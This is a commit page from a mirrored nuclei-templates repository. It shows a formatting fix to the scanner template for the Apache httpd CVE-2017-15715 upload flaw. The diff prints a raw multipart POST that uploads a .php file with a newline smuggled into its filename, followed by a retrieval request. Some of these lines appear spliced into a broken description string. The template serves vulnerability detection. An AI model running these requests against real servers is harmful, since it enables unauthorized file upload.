daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

misc format fixes

patch-1
sandeep 2023-12-12 17:29:52 +05:30
parent 3961cfc660
commit bed51ef8b5
1 changed files with 2 additions and 30 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
http/cves/2017/CVE-2017-15715.yaml
View File

@ -4,36 +4,8 @@ info:
name: Apache httpd <=2.4.29 - Arbitrary File Upload
author: geeknik
severity: high
description: Apache httpd 2.4.0 to 2.4.29 is susceptible to arbitrary file upload vulnerabilities via the expression specified in <FilesMatch>, which could match '
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ
------WebKitFormBoundaryKc8fBVDo558U4hbJ
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
{{randstr_1}}
------WebKitFormBoundaryKc8fBVDo558U4hbJ
Content-Disposition: form-data; name="name"
{{randstr}}.php\x0A
------WebKitFormBoundaryKc8fBVDo558U4hbJ--
- |
GET /{{randstr}}.php\x0A HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip,deflate
Accept: */*
matchers:
- type: dsl
dsl:
- 'contains(body_2, "{{randstr_1}}")'
# digest: 4b0a00483046022100af8962fbdb45cc4ff2bc412d3c73e1b707e524f8519921ef714fa539b773e3e3022100de4b291e6b8d8f658fe84fda467200476d0f45862a519b81135840f172189cf6:922c64590222798bb761d5b6d8e72950 to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
description: |
Apache httpd 2.4.0 to 2.4.29 is susceptible to arbitrary file upload vulnerabilities via the expression specified in <FilesMatch>, which could match '$' to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
remediation: |
Upgrade Apache httpd to a version higher than 2.4.29 or apply the necessary patches.
reference: